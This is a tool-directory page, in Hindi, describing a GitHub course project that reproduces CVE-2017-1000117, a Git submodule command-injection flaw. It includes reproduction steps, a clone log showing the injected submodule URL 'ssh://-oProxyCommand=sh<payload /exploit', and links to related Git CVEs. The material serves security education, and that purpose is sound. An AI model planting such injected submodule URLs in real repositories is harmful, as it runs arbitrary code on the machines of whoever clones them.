Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-1000117 — CVE-2017-1000117漏洞复现(PoC+Exp) | Kitploit
उपकरण/GitHubGitHub/anonymking/cve-2017-1000117
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubanonymking/cve-2017-1000117

CVE-2017-1000117

CVE-2017-1000117漏洞复现(PoC+Exp)

रिपॉजिटरी देखें
3217 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2017-1000117

परियोजना परिचय

  • नेटवर्क सुरक्षा पाठ्यक्रम डिजाइन का एक विषय
  • CVE-2017-1000117 भेद्यता का पुनरुत्पादन (PoC+Exp)
  • Git + SSH

भेद्यता परिचय:

  • भेद्यता नाम: Git कमांड इंजेक्शन भेद्यता
  • CNNVD क्रमांक: CNNVD-201708-670
  • खतरा स्तर: मध्यम
  • CVE क्रमांक: CVE-2017-1000117
  • भेद्यता प्रकार: कमांड इंजेक्शन
  • प्रकाशन तिथि: 2017-08-16
  • खतरा प्रकार: दूरस्थ
  • अद्यतन तिथि: 2017-10-17
  • निर्माता: git-scm
  • भेद्यता स्रोत: TrevorJay
  • भेद्यता परिचय: Git अमेरिकी सॉफ्टवेयर डेवलपर लिनस टॉर्वाल्ड्स (Linus Torvalds) द्वारा विकसित एक मुफ्त, ओपन-सोर्स वितरित संस्करण नियंत्रण प्रणाली है। Git 2.7.5 से पहले के संस्करणों में एक कमांड भेद्यता मौजूद है। दूरस्थ हमलावर एक विशेष रूप से तैयार 'ssh://...' URL का उपयोग करके इस भेद्यता का दोहन कर सकते हैं और किसी भी उपकरण पर पहले से बाहर निकले प्रोग्राम को चला सकते हैं।

दोहन प्रक्रिया

  • लिनक्स के लिए Git और विंडोज के लिए Git के भेद्यता-प्रभावित संस्करण स्थापित करें (Git for Linux, Git for Windows))
  • मैंने यहाँ git-2.12.1 संस्करण चुना (स्वयं परीक्षण किया कि लिनक्स और विंडोज दोनों पर यह संस्करण काम करता है) (लिनक्स और विंडोज के लिए संस्करण के डाउनलोड पते क्रमशः और हैं)
2.12.1
git-2.12.1.tar.gz
Git-2.12.1-64-bit.tar.bz2
  • Git स्थापित करने के बाद सीधे सबमॉड्यूल सहित प्रोजेक्ट को क्लोन करें: git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
  • root@kitploit:~
    $ git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
    Cloning into 'CVE-2017-1000117'...
    remote: Enumerating objects: 14, done.
    remote: Counting objects: 100% (14/14), done.
    remote: Compressing objects: 100% (13/13), done.
    remote: Total 14 (delta 3), reused 8 (delta 0), pack-reused 0
    Unpacking objects: 100% (14/14), done.
    Submodule 'exploit' (ssh://-oProxyCommand=sh<payload /exploit) registered for path 'exploit'
    Cloning into 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit'...
    Pseudo-terminal will not be allocated because stdin is not a terminal.
    
    
    *********************************************
                       _ooOoo_
                      o8888888o
                      88" . "88
                      (| -_- |)
                      O\  =  /O
                   ____/`---'\____
                 .'  \\|     |//  `.
                /  \\|||  :  |||//  \
               /  _||||| -:- |||||-  \
               |   | \\\  -  /// |   |
               | \_|  ''\---/''  |   |
               \  .-\__  `-`  ___/-. /
             ___`. .'  /--.--\  `. . __
          ."" '&lt;  `.___\_&lt;|>_/___.'  >'"".
         | | :  `- \`.;`\ _ /`;.`/ - ` : | |
         \  \ `-.   \_ __\ /__ _/   .-` /  /
    ======`-.____`-.___\_____/___.-`____.-'======
                       `=---='
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    
    ssh_exchange_identification: Connection closed by remote host
    fatal: Could not read from remote repository.
    
    Please make sure you have the correct access rights
    and the repository exists.
    fatal: clone of 'ssh://-oProxyCommand=sh<payload /exploit' into submodule path 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit' failed
    Failed to clone 'exploit'. Retry scheduled
    
    • जब आप बुद्ध को प्रकट होते देखेंगे, तो भेद्यता पुनः उत्पन्न हो चुकी है, और पेलोड में दुर्भावनापूर्ण कोड सफलतापूर्वक निष्पादित हो चुका है।

    2019/06/21 10:30 अद्यतन

    • रिपोर्ट लिखते समय अचानक पता चला कि यह भेद्यता CVE-2018-17456 से बहुत मिलती-जुलती है, बस इसे अलग तरह से कहा गया है। मूल रूप से, दोनों प्रतीक "-" को सही ढंग से पार्स करने में असमर्थ हैं, और इसे एक पैरामीटर के रूप में गलत पार्स करने से मनमाना कोड निष्पादन होता है।
    • CVE-2018-17456 भेद्यता के दोहन के बारे में, इस ब्लॉग पोस्ट को देखें: [《Git Submodule भेद्यता (CVE-2018-17456) का विश्लेषण》](https://paper.seebug.org/716/](https://paper.seebug.org/716/)

    2019/06/21 19:39 अद्यतन

    • संबंधित सामग्री खोजते समय एक और समान भेद्यता CVE-2018-11235 मिली
    • CVE-2018-11235 भेद्यता के लिए यहां कुछ संदर्भ लेख दिए गए हैं: CVE-2018-11235 git RCE, PoC exploit for CVE-2018-11235, Git दूरस्थ कोड निष्पादन भेद्यता (CVE-2018-11235) का विस्तृत विश्लेषण
    टूल डाउनलोड करें